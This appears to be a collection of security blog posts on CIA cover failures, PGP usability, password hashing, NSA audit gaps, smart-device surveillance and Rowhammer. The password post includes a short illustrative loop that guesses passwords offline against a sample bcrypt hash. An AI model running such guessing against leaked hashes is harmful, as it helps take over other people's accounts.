When departments work at cross-purposes

Back in August, we wrote about how self-discipline can be one of the hardest parts of security, as illustrated by Snowden and the NSA. Just recently, Salon published an article about similar issues that plagued the CIA during the Cold War: How to explain the KGB’s amazing success identifying CIA agents in the field?

So many CIA agents were being uncovered by the Soviets that the agency assumed there must’ve been double agents… somewhere. Apparently there was a lot of inward-focused paranoia. The truth was a lot more mundane, but also very actionable — not only for the CIA, but for business in general: two departments (in this case, two agencies) in one organization with incompatible, uncoordinated policies:

So how, exactly, did Totrov reconstitute CIA personnel listings without access to the files themselves or those who put them together?

His approach required a clever combination of clear insight into human behavior, root common sense and strict logic.

In the world of secret intelligence the first rule is that of the ancient Chinese philosopher of war Sun Tzu: To defeat the enemy, you have above all to know yourself. The KGB was a huge bureaucracy within a bureaucracy — the Soviet Union. Any Soviet citizen had an intimate acquaintance with how bureaucracies function. They are fundamentally creatures of habit and, as any cryptanalyst knows, the key to breaking the adversary’s cipher is to find repetitions. The same applies to the parallel universe of human counterintelligence.

The difference between Totrov and his fellow citizens was that whereas others at home and abroad would assume the Soviet Union was somehow unique, he applied his understanding of his own society to a society that on the surface seemed unique, but which, in respect of how government worked, was not in fact that much different: the United States.

From an organizational point of view, what’s fascinating is that the problem came from two agencies with different missions having incompatible, uncoordinated policies: the policies for Foreign Service Officers and the policies for CIA officers were different enough that the Soviets could identify individuals who were theoretically Foreign Service Officers but who did not receive the same treatment as actual Foreign Service Officers. Pay and policy differentials made it easy to separate real Foreign Service Officers from CIA agents.

Thus one productive line of inquiry quickly yielded evidence: the differences in the way agency officers undercover as diplomats were treated from genuine foreign service officers (FSOs). The pay scale at entry was much higher for a CIA officer; after three to four years abroad a genuine FSO could return home, whereas an agency employee could not; real FSOs had to be recruited between the ages of 21 and 31, whereas this did not apply to an agency officer; only real FSOs had to attend the Institute of Foreign Service for three months before entering the service; naturalized Americans could not become FSOs for at least nine years but they could become agency employees; when agency officers returned home, they did not normally appear in State Department listings; should they appear they were classified as research and planning, research and intelligence, consular or chancery for security affairs; unlike FSOs, agency officers could change their place of work for no apparent reason; their published biographies contained obvious gaps; agency officers could be relocated within the country to which they were posted, FSOs were not; agency officers usually had more than one working foreign language; their cover was usually as a “political” or “consular” official (often vice-consul); internal embassy reorganizations usually left agency personnel untouched, whether their rank, their office space or their telephones; their offices were located in restricted zones within the embassy; they would appear on the streets during the working day using public telephone boxes; they would arrange meetings for the evening, out of town, usually around 7.30 p.m. or 8.00 p.m.; and whereas FSOs had to observe strict rules about attending dinner, agency officers could come and go as they pleased.

You don’t need to infiltrate the CIA if the CIA and the State Department can’t agree on how to treat their staff and what rules to apply!

One way of looking at the problem was that the diplomats had their own goals, and they set policies appropriate to those goals. By necessity, they didn’t actually know the overall goals of their own embassies. It’s not unusual for different subdivisions of an organization to have conflicting goals. The question is how to manage those tensions. What was the point of requiring a nine-year wait after naturalization before someone could work as a Foreign Service Officer? A different executive agency, with a greater need for the integrity of its agents, didn’t consider the wait necessary. Eliminating the wait would’ve eliminated an obvious difference between agents and ordinary diplomats.

But are we sure the wait wasn’t necessary? It creates a large obstacle for our adversaries: they need to think nine years ahead if they want to supply their own mole instead of turning one of our diplomats. On the other hand, it created too large an obstacle for our own side.

Is it more important to defend against foreign agents or to create high-quality cover for our own agents? Two agencies disagreed and pursued their own interests without resolving the disagreement. Either policy could have been effective; having both policies was an information give-away.

How can this sort of issue arise for private businesses? Too often individual departments can set policies that come into conflict with one another. For instance, an IT department may, with perfectly reasonable justification, decide to standardize on a single browser. A second department then decides to develop internal tools that rely on browser add-ons like ActiveX or Java applets. When a vulnerability is discovered in those add-ons to the standard browser, the organization finds it is now dependent on an inherently insecure tool. Neither department is responsible for the situation; both acted in good faith within their own arena. The problem was caused by the lack of anyone responsible for setting policies for the good of the organization as a whole.

Security policies need to be set to take all the organization’s goals into consideration; to do that, someone has to be looking at the whole picture.

PGP: Still hard to use after 16 years

Earlier this month, SC magazine ran an article about this tweet from Joseph Bonneau at the Electronic Frontier Foundation:

Email from Phil Zimmerman: “Sorry, but I cannot decrypt this message. I don’t have a version of PGP that runs on any of my devices”

PGP, short for Pretty Good Privacy, is an email encryption system invented by Phil Zimmermann in 1991. So why isn’t Zimmermann eating his own dog food?

“The irony is not lost on me,” he says in this article at Motherboard, which is about PGP’s usability problems. Jon Callas, former Chief Scientist at PGP, Inc., tweeted that “We have done a good job of teaching people that crypto is hard, but cryptographers think that UX is easy.” It would be easy for a cryptographer to forget that 25% of people have math anxiety. Cryptographers are used to creating timing attack-resistant implementations of AES. You can get a great sense of what’s involved from this explanation of AES, which is illustrated with stick figures. The steps are very complicated. In the general population, surprisingly few people can follow complex written instructions.

All the way back in 1999, there was a paper presented at USENIX called “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0.” It included a small study with a dozen reasonably intelligent people:

The user test was run with twelve different participants, all of whom were experienced users of email, and none of whom could describe the difference between public and private key cryptography prior to the test sessions. The participants all had attended at least some college, and some had graduate degrees. Their ages ranged from 20 to 49, and their professions were diversely distributed, including graphic artists, programmers, a medical student, administrators and a writer.

The participants were given 90 minutes to learn and use PGP, under realistic conditions:

Our test scenario was that the participant had volunteered to help with a political campaign and had been given the job of campaign coordinator (the party affiliation and campaign issues were left to the participant’s imagination, so as not to offend anyone). The participant’s task was to send out campaign plan updates to the other members of the campaign team by email, using PGP for privacy and authentication. Since presumably volunteering for a political campaign implies a personal investment in the campaign’s success, we hoped that the participants would be appropriately motivated to protect the secrecy of their messages…

After briefing the participants on the test scenario and tutoring them on the use of Eudora, they were given an initial task description which provided them with a secret message (a proposed itinerary for the candidate), the names and email addresses of the campaign manager and four other campaign team members, and a request to please send the secret message to the five team members in a signed and encrypted email. In order to complete this task, a participant had to generate a key pair, get the team members’ public keys, make their own public key available to the team members, type the (short) secret message into an email, sign the email using their private key, encrypt the email using the five team members’ public keys, and send the result. In addition, we designed the test so that one of the team members had an RSA key while the others all had Diffie-Hellman/DSS keys, so that if a participant encrypted one copy of the message for all five team members (which was the expected interpretation of the task), they would encounter the mixed key types warning message. Participants were told that after accomplishing that initial task, they should wait to receive email from the campaign team members and follow any instructions they gave.

If that’s mystifying, that’s the point. You can get a very good sense of how you would’ve done, and how much has changed in 16 years, by reading the Electronic Frontier Foundation’s guide to using PGP on a Mac. The study participants were given 90 minutes to complete the task.

Things went wrong immediately:

Three of the twelve test participants (P4, P9, and P11) accidentally emailed the secret to the team members without encryption. Two of the three (P9 and P11) realized immediately that they had done so, but P4 appeared to believe that the security was supposed to be transparent to him and that the encryption had taken place. In all three cases the error occurred while the participants were trying to figure out the system by exploring.

Cryptographers are absolutely right that cryptography is hard:

Among the eleven participants who figured out how to encrypt, failure to understand the public key model was widespread. Seven participants (P1, P2, P7, P8, P9, P10 and P11) used only their own public keys to encrypt email to the team members. Of those seven, only P8 and P10 eventually succeeded in sending correctly encrypted email to the team members before the end of the 90 minute test session (P9 figured out that she needed to use the campaign manager’s public key, but then sent email to the entire team encrypted only with that key), and they did so only after they had received fairly explicit email prompting from the test monitor posing as the team members. P1, P7 and P11 appeared to develop an understanding that they needed the team members’ public keys (for P1 and P11, this was also after they had received prompting email), but still did not succeed at correctly encrypting email. P2 never appeared to understand what was wrong, even after twice receiving feedback that the team members could not decrypt his email.
Another of the eleven (P5) so completely misunderstood the model that he generated key pairs for each team member rather than for himself, and then attempted to send the secret in an email encrypted with the five public keys he had generated. Even after receiving feedback that the team members were unable to decrypt his email, he did not manage to recover from this error.

The user interface can make it even harder:

P7 gave up on using the key server after one failed attempt in which she tried to retrieve the campaign manager’s public key but got nothing back (perhaps due to mis-typing the name). P1 spent 25 minutes trying and failing to import a key from an email message; he copied the key to the clipboard but then kept trying to decrypt it rather than import it. P12 also had difficulty trying to import a key from an email message: the key was one she already had in her key ring, and when her copy and paste of the key failed to have any effect on the PGPKeys display, she assumed that her attempt had failed and kept trying. Eventually she became so confused that she began trying to decrypt the key instead.

This is all so frustrating and unpleasant for people that they simply won’t use PGP. We actually have a way of encrypting email that’s not known to be breakable by the NSA. In practice, the human factors are even more difficult than stumping the NSA’s cryptographers!

Complexity and Storage Slow Attackers Down

Back in 2013, WhiteHat founder Jeremiah Grossman forgot an important password, and Jeremi Gosney of Stricture Consulting Group helped him crack it. Gosney knows password cracking, and he’s up for a challenge, but he knew it’d be futile trying to crack the leaked Ashley Madison passwords. Dean Pierce gave it a shot, and Ars Technica provides some context.

Ashley Madison made mistakes, but password storage wasn’t one of them. This is what came of Pierce’s efforts:

After five days, he was able to crack only 4,007 of the weakest passwords, which comes to just 0.0668 percent of the six million passwords in his pool.

It’s like Jeremiah said after his difficult experience:

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity. I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Imagine the average person that doesn’t even work in IT! Logging in to a website feels simpler than it is. It feels like, “The website checked my password, and now I’m logged in.”

Actually, “being logged in” means that the server gave your browser a secret number, AND your browser includes that number every time it makes a request, AND the server has a table of which number goes with which person, AND the server sends you the right stuff based on who you are. Usernames and passwords have to do with whether the server gives your browser the secret number in the first place.
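
As a concrete illustration, here is a minimal sketch of that flow, assuming a bare Node.js HTTP server and an in-memory table; a real site would verify the password before handing out the secret number and would store sessions more durably.

```typescript
import * as http from "http";
import { randomBytes } from "crypto";

// Hypothetical in-memory table: secret number -> who it belongs to.
const sessions = new Map<string, string>();

http.createServer((req, res) => {
  if (req.url === "/login") {
    // (Password check omitted.) Hand the browser a random secret number.
    const sessionId = randomBytes(32).toString("hex");
    sessions.set(sessionId, "alice");
    res.setHeader("Set-Cookie", `session=${sessionId}; HttpOnly; Secure`);
    res.end("Logged in");
    return;
  }

  // Every later request: look up the secret number to decide who this is
  // and what they should be allowed to see.
  const match = (req.headers.cookie ?? "").match(/session=([0-9a-f]+)/);
  const user = match ? sessions.get(match[1]) : undefined;
  res.end(user ? `Hello, ${user}` : "Please log in");
}).listen(8080);
```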

It’s natural to assume that “checking your password” means that the server knows your password, and it compares it to what you typed in the login form. By now, everyone has heard that they’re supposed to have an impossible-to-remember password, but the reasons aren’t usually explained – people have their own problems besides the finer points of PBKDF2 vs. bcrypt.

If you’ve never had to think about it, it’s also natural to assume that hackers guessing your password are literally trying to log in as you. Even professional programmers can make that assumption, when password storage is outside their area of expertise. Our clients’ developers sometimes object to findings about password complexity or other brute force issues because they throttle login attempts, lock accounts after 3 incorrect guesses, etc. If attackers really had to go through the login form, they would be greatly limited by how long it takes to make each request over the network. Account lockouts are probably enough to discourage a person’s acquaintances, but they aren’t a protection against offline password cracking.

Password complexity requirements (include mixed case, include numbers, include symbols) are there to protect you once an organization has already been compromised (like Ashley Madison). In that scenario, password complexity is what you can do to help yourself. Proper password storage is what the organization can do. The key to that is in what exactly “checking your password” means.

When the server receives your login attempt, it runs your password through something called a hash function. When you set your password, the server ran your password through the hash function and stored the result, not your password. The server should only keep the password long enough to run it through the hash function. The difference between secure and insecure password storage is in the choice of hash function.
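
A sketch of what that looks like in code, using the widely deployed bcrypt library for Node (the function names here are my own):

```typescript
import bcrypt from "bcrypt";

// When the user sets a password: store only the hash, never the password.
async function storePasswordHash(password: string): Promise<string> {
  return bcrypt.hash(password, 12); // cost factor 12: deliberately slow
}

// When the user logs in: hash the attempt and compare it to the stored hash.
// The plaintext attempt can be discarded as soon as this returns.
async function checkPassword(attempt: string, storedHash: string): Promise<boolean> {
  return bcrypt.compare(attempt, storedHash);
}
```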

If your enemy is using brute force against you and trying every single thing, your best bet is to slow them down. That’s the thinking behind account lockouts and the design of functions like bcrypt. Running data through a hash function might be fast or slow, depending on the hash function. Hash functions have many applications. You can use them to confirm that large files haven’t been corrupted, and for that purpose it’s good for them to be fast. SHA256 would be a hash function suitable for that.
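
The file-integrity case is the “fast is good” case. A quick sketch (the file name is made up):

```typescript
import { createHash } from "crypto";
import { readFileSync } from "fs";

// Hash an entire downloaded file and compare the digest against the
// checksum the vendor published. Here, fast hashing is a feature.
const digest = createHash("sha256")
  .update(readFileSync("downloaded-installer.iso"))
  .digest("hex");

console.log(digest);
```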

A common mistake is using a deliberately fast hash function, when a deliberately slow one is appropriate. Password storage is an unusual situation where we want the computation to be as slow and inefficient as practicable.

In the case of hackers who’ve compromised an account database, they have a table of usernames and strings like “$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy”. Cracking the password means that they make a guess, run it through the hash function, and get the same string. If you use a complicated password, they have to try more passwords. That’s what you can do to slow them down. What organizations can do is to choose a hash function that makes each individual check very time-consuming. It’s cryptography, so big numbers are involved. The “only” thing protecting the passwords of Ashley Madison users is that trying even a tiny fraction of the possible passwords is too time-consuming to be practical.
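
Conceptually, offline cracking is nothing more than a loop. In this sketch the hash is just the example string from the paragraph above and the wordlist is tiny; whether anything matches depends on what that hash actually encodes, but the shape of the attack is the point:

```typescript
import bcrypt from "bcrypt";

const leakedHash =
  "$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy";

// No login form, no lockouts, no network: just guess, hash, compare.
const wordlist = ["123456", "letmein", "qwerty", "password"];

for (const guess of wordlist) {
  // Every compare re-runs the deliberately slow hash, which is the only
  // thing rate-limiting the attacker once the database has leaked.
  if (bcrypt.compareSync(guess, leakedHash)) {
    console.log(`Cracked: ${guess}`);
    break;
  }
}
```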

Consumers have all the information they need to learn about password storage best practices and to pressure companies to use those practices. At least one website is devoted to the cause. It’s interesting that computers are forcing ordinary people to think about these things, and not just spies.

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkeley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • Github
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duosec 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • Apparmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API to WordPress.org for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but they can’t know all of these things all at once, especially given how quickly technologies change. Since there is no one who can understand all of those things at once, we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the numbers of full-stack security experts. People may know quite a bit about a lot of these technologies, but when it comes down to it, there’s a very real chance that any single security person will become more and more specialized over time — it’s simply hard to avoid specialization, given the growing complexity of modern apps. We may eventually see the death of the full-stack security person as well as a result.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means that there will be more and more silos where people will handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failing to draw on diverse, and often external, security and operations expertise will ensure sec-ops failure.

At its heart, this is a result of economic forces – more code needs to be delivered and there are fewer people who understand what it’s actually doing. So you outsource what you can’t know, since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other service providers, and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Developers and Security Tools

A recent study from NC State states that “the two things that were most strongly associated with using security tools were peer influence and corporate culture.” As a former developer, and as someone who has reviewed the source code of countless web applications, I can say these tools are almost impossible for the average developer to use. Security tools are invariably written for security experts and consultants. Tools produce a huge percentage of false alarms – if you are lucky, you will comb through 100 false alarms to find one legitimate issue.

The false assumption here is that running a tool will result in better security. Peer pressure to do security doesn’t quite make sense because most developers are not trained in security. And since the average tool produces a large number of false alarms, and since the pressure to ship new features as quickly as possible is so high, there will never be enough time, training or background for the average developer to effectively evaluate their own security.

The “evangelist” model the study mentions does seem to work well among some of WhiteHat Security’s clients. Anecdotally, I know many organizations that will accept one volunteer per group as a security “marshal” (something akin to a floor “fire marshal”). That volunteer receives special security training, but ultimately acts as a bridge between his or her individual development team and the security team.

Placing the burden of security entirely on the developers is unfair, as is making them choose between fixing vulnerabilities and shipping new code. One of the dirty secrets of technology is this: even though developers are often shouldered with the responsibility of security, risk and security are really business decisions. Security is also a process that goes far beyond the development process. Developers cannot be solely responsible for application security. Business analysts, architects, developers, quality assurance, security teams, and operations all play a critical role in managing technology risk. And above all, managers (including the C-level team) must provide direction, set levels of tolerable risk, and take ultimate responsibility for deciding whether to ship new code or fix vulnerabilities. That is, in the end, a business decision.

It Can Happen to Anyone

Earlier this summer, The Intercept published some details about the NSA’s XKEYSCORE program. Those details included some security issues around logging and authorization:

As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to ensure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

These are exactly the same kinds of problems that led to the Snowden leaks:

As a system administrator, Snowden was allowed to look at any file he wanted, and his actions were largely unaudited. “At certain levels, you are the audit,” said an intelligence official.

He was also able to access NSAnet, the agency’s intranet, without leaving any signature, said a person briefed on the postmortem of Snowden’s theft. He was essentially a “ghost user,” said the source, making it difficult to trace when he signed on or what files he accessed.

If he wanted, he would even have been able to pose as any other user with access to NSAnet, said the source.

The NSA obviously had the in-house expertise to design the system differently. Surely they know the importance of logging from their own experience hacking things and responding to breaches. How could this happen?

The most cynical explanation is that the point is not to log everything. Plausible deniability is a goal of intelligence agencies. Nobody can subpoena records that don’t exist. The simple fact of tracking an individual can be highly sensitive (e.g., foreign heads of state).

There’s also a simpler explanation: basic organizational problems. From the same NBC News article:

“It’s 2013 and the NSA is stuck in 2003 technology,” said an intelligence official.

Jason Healey, a former cyber-security official in the Bush Administration, said the Defense Department and the NSA have “frittered away years” trying to catch up to the security technology and practices used in private industry. “The DoD and especially NSA are known for awesome cyber security, but this seems somewhat misplaced,” said Healey, now a cyber expert at the Atlantic Council. “They are great at some sophisticated tasks but oddly bad at many of the simplest.”

In other words, lack of upgrades, “not invented here syndrome,” outsourcing with inadequate follow-up and accountability, and other familiar issues affect even the NSA. Very smart groups of people have these issues, even when they understand them intellectually.

Each individual department of the NSA probably faces challenges very similar to those of a lot of software companies: things need to be done yesterday, and done cheaper. New features are prioritized above technical debt. “It’s just an internal system, and we can trust our own people, anyway…”

Security has costs. Those costs include money, time, and convenience — making a system secure creates obstacles, so there’s always a temptation to ignore security “just this once,” “just for this purpose,” “just for now.” Security is a game in which the adversary tests your intelligence and creativity, yes; but most of all, the adversary tests your thoroughness and your discipline.

Conspiracy Theory and the Internet of Things

I came across this article about smart devices on Alternet, which tells us that “we are far from a digital Orwellian nightmare.” We’re told that worrying about smart televisions, smart phones, and smart meters is for “conspiracy theorists.”

It’s a great case study in not having a security mindset.

This is what David Petraeus said about the Internet of Things at the In-Q-Tel CEO summit in 2012, while he was head of the CIA:

Items of interest will be located, identified, monitored, and remotely controlled through technologies such as radio-frequency identification, sensor networks, tiny embedded servers, and energy harvesters—all connected to the next-generation Internet using abundant, low cost, and high-power computing—the latter now going to cloud computing, in many areas greater and greater supercomputing, and, ultimately, heading to quantum computing.

In practice, these technologies could lead to rapid integration of data from closed societies and provide near-continuous, persistent monitoring of virtually anywhere we choose. “Transformational” is an overused word, but I do believe it properly applies to these technologies, particularly to their effect on clandestine tradecraft. Taken together, these developments change our notions of secrecy and create innumerable challenges—as well as opportunities.

In-Q-Tel is a venture capital firm that invests “with the sole purpose of delivering these cutting-edge technologies to IC [intelligence community] end users quickly and efficiently.” Quickly means 3 years, for their purposes.

It’s been more than 3 years since Petraeus made those remarks, so “Is the CIA meeting its stated goals?” is a fair question. Evil space lizards are an absurd conspiracy theory; this is not.

Smart Televisions

The concerns are confidently dismissed:

Digital Trends points out that smart televisions aren’t “always listening” as they are being portrayed in the media. In fact, such televisions are asleep most of the time, and are only awaken [sic] when they hear a pre-programmed phrase like “Hi, TV.” So, any conversation you may be having before waking the television is not captured or reported. In fact, when the television is listening, it informs the user it is in this mode by beeping and displaying a microphone icon. And when the television enters into listening mode, it doesn’t comprehend anything except a catalog of pre-programmed, executable commands.

Mistaken assumption: gadgets work as intended.

Here’s a Washington Post story from 2013:

The FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years, and has used that technique mainly in terrorism cases or the most serious criminal investigations, said Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, now on the advisory board of Subsentio, a firm that helps telecommunications carriers comply with federal wiretap statutes.

Logically speaking, how does the smart TV know it’s heard a pre-programmed phrase? The microphone must be on so that ambient sounds and the pre-programmed phrases can be compared. We already know the device can transmit data over the internet. The issue is whether or not data can be transmitted at the wrong time, to the wrong people. What if there was a simple bug that kept the microphone from shutting off, once it’s turned on? That would be analogous to insufficient session expiration in a web app, which is pretty common.
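
A toy sketch of the logic in question (every name here is invented) makes the failure mode concrete: the audio loop has to run continuously to hear the wake phrase at all, and one missing state reset keeps audio flowing upstream.

```typescript
let listening = false;

// Stand-in for on-device keyword spotting ("Hi, TV").
function matchesWakePhrase(frame: Float32Array): boolean {
  return false;
}

// Stand-in for the upload to the third-party speech service.
function sendToSpeechServer(frame: Float32Array): void {}

function onAudioFrame(frame: Float32Array): void {
  if (!listening) {
    if (matchesWakePhrase(frame)) listening = true;
    return; // frames are supposed to be dropped here
  }
  // If nothing ever sets `listening` back to false -- the analogue of
  // insufficient session expiration -- every later frame gets uploaded.
  sendToSpeechServer(frame);
}
```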

The author admits that voice data is being sent to servers advanced enough to detect regional dialects. A low-profile third party contractor has the ability to know whether someone with a different accent is in your living room:

With smart televisions, some information, like IP address and other stored data may be transmitted as well. According to Samsung, its speech recognition technology can also be used to better recognize regional dialects and accents and other things to enhance the user experience. To do all these things, smart television makers like Samsung must employ third-party applications and servers to help them decipher the information it takes in, but this information is encrypted during transmission and not retained or for sale, at least according to the company’s privacy policy.

Can we trust that the encryption is done correctly, and nobody’s stolen the keys? Can we trust that the third parties doing natural language processing haven’t been compromised?

Smart Phones

The Alternet piece has an anecdote of someone telling the author to “Never plug your phone in at a public place; they’ll steal all your information.” Someone can be technically unsophisticated but have the right intuitions. The man doesn’t understand that his phone broadcasts radio waves into the environment, so he has an inaccurate mental model of the threat. He knows that there is a threat.

Then this passage:

A few months back, a series of videos were posted to YouTube and Facebook claiming that the stickers affixed to cellphone batteries are transmitters used for data collection and spying. The initial video showed a man peeling a Near Field Communication transmitter off the wrapper on his Samsung Galaxy S4 battery. The person speaking on the video claims this “chip” allows personal information, such as photographs, text messages, videos and emails to be shared with nearby devices and “the company.” He recommended that the sticker be removed from the phone’s battery….

And that sticker isn’t some nefarious implant the phone manufacturer uses to spy on you; it’s nothing more than a coil antenna to facilitate NFC transmission. If you peel this sticker from your battery, it will compromise your smartphone and likely render it useless for apps that use NFC, like Apple Pay and Google Wallet.

As Ars Technica put it in 2012:

By exploiting multiple security weakness in the industry standard known as Near Field Communication, smartphone hacker Charlie Miller can take control of handsets made by Samsung and Nokia. The attack works by putting the phone a few centimeters away from a quarter-sized chip, or touching it to another NFC-enabled phone. Code on the attacker-controlled chip or handset is beamed to the target phone over the air, then opens malicious files or webpages that exploit known vulnerabilities in a document reader or browser, or in some cases in the operating system itself.

Here, the author didn’t imagine a scenario where someone might get a malicious device within a few centimeters of his phone. “Can I borrow your phone?” “Place all items from your pockets in the tray before stepping through the security checkpoint.” “Scan this barcode for free stuff!”

Smart Meters

Finally, the Alternet piece has this to say about smart meters:

In recent years, privacy activists have targeted smart meters, saying they collect detailed data about energy consumption. These conspiracy theorists are known to flood public utility commission meetings, claiming that smart meters can do a lot of sneaky things like transmit the television shows they watch, the appliances they use, the music they listen to, the websites they visit and their electronic banking use. They believe smart meters are the ultimate spying tool, making the electrical grid and the utilities that run it the ultimate spies.

Again, people can have the right intuitions about things without being technical specialists. That doesn’t mean their concerns are absurd:

The SmartMeters feature digital displays, rather than the spinning-usage wheels seen on older electromagnetic models. They track how much energy is used and when, and transmit that data directly to PG&E. This eliminates the need for paid meter readers, since the utility can immediately access customers’ usage records remotely and, theoretically, find out whether they are consuming, say, exactly 2,000 watts for exactly 12 hours a day.

That’s a problem, because usage patterns like that are telltale signs of indoor marijuana grow operations, which will often run air or water filtration systems round the clock, but leave grow lights turned on for half the day to simulate the sun, according to the Silicon Valley Americans for Safe Access, a cannabis users’ advocacy group.

What’s to stop PG&E from sharing this sensitive information with law enforcement? SmartMeters “pose a direct privacy threat to patients who … grow their own medicine,” says Lauren Vasquez, Silicon Valley ASA’s interim director. “The power company may report suspected pot growers to police, or the police may demand that PG&E turn over customer records.”

Even if you’re not doing anything ambiguously legal, the first thing you do when you get home is probably turning on the lights. Different appliances use different amounts of power. By reporting power consumption at much more frequent intervals, smart meters can give away a lot about what’s going on in a house.
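
A toy illustration of that inference, with made-up wattages: once readings arrive every few seconds instead of once a month, step changes in load line up with individual appliances.

```typescript
// Rough, invented appliance signatures in watts.
const signatures: Record<string, number> = {
  kettle: 2000,
  "washing machine": 500,
  television: 100,
};

// Given a sudden jump in the meter reading, guess what was switched on.
function guessAppliance(deltaWatts: number): string | undefined {
  return Object.keys(signatures).find(
    (name) => Math.abs(signatures[name] - deltaWatts) < 50
  );
}

console.log(guessAppliance(1980)); // "kettle"
```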


That’s not the same as what you were watching on TV, but the content of phone conversations isn’t all that’s interesting about them, either.

It’s hard to trust things.

Hammering at speed limits

Slate has a well-written article explaining an interesting new vulnerability called “Rowhammer.” The white paper is here, and the code repository is here. Here’s the abstract describing the basic idea:

As DRAM has been scaling to increase in density, the cells are less isolated from each other. Recent studies have found that repeated accesses to DRAM rows can cause random bit flips in an adjacent row, resulting in the so called Rowhammer bug. This bug has already been exploited to gain root privileges and to evade a sandbox, showing the severity of faulting single bits for security. However, these exploits are written in native code and use special instructions to flush data from the cache.

In this paper we present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

What’s interesting to me is how much computers had to advance to make this situation possible. First, RAM had to be miniaturized enough that adjacent memory cells can interfere with one another. The RAM’s refresh rate had to be tuned as low as possible, because refreshing memory uses up time and power.

Lots more had to happen before this was remotely exploitable via JavaScript. JavaScript wasn’t designed to quickly process binary data, or really even deal with binary data. It’s a high-level language without pointers or direct memory access. Semantically, JavaScript arrays aren’t contiguous blocks of memory like C arrays. They’re special objects whose keys happen to be integers. The third and fourth entries of an array aren’t necessarily next to each other in memory, and each item in an array might have a different type.

Typed Arrays were introduced for performance reasons, to facilitate working with binary data. They were especially necessary for allowing fast 3D graphics with WebGL. Typed Arrays do occupy adjacent memory cells, unlike normal arrays.
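
The difference is easy to see in code; this is ordinary JavaScript/TypeScript, nothing specific to the attack.

```typescript
// An ordinary array: elements can have different types, and the engine is
// free to store it as an object keyed by integers rather than one
// contiguous block of memory.
const mixed: unknown[] = [3, "four", { five: 5 }];

// A typed array: a view over one contiguous buffer, one byte per element,
// which is what makes fast binary processing possible from script -- and
// gives scripts much finer control over memory access patterns.
const buffer = new ArrayBuffer(1024);
const bytes = new Uint8Array(buffer);
bytes[0] = 255;
bytes[1] = 128;

console.log(mixed.length, bytes.byteLength); // 3 1024
```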

In other words, computers had to get faster, websites had to get fancier, and performance expectations had to go up.

Preventing the attack would kill performance at a hardware level: the RAM would have to spend up to 35% of its time refreshing itself. Short of hardware changes, the authors suggest that browser vendors implement tests for the vulnerability, then throttle JavaScript performance if the system is found to be vulnerable. JavaScript should have to be actively enabled by the user when they visit a website.

It seems unlikely that browser vendors are going to voluntarily undo all the work they’ve done, but they could. It would be difficult to explain to the “average person” that their computer needs to slow down because of some “Rowhammer” business. Rowhammer exists because both hardware and software vendors listened to consumer demands for higher performance. We could slow down, but it’s psychologically intolerable. The known technical solution is emotionally unacceptable to real people, so more advanced technical solutions will be attempted.

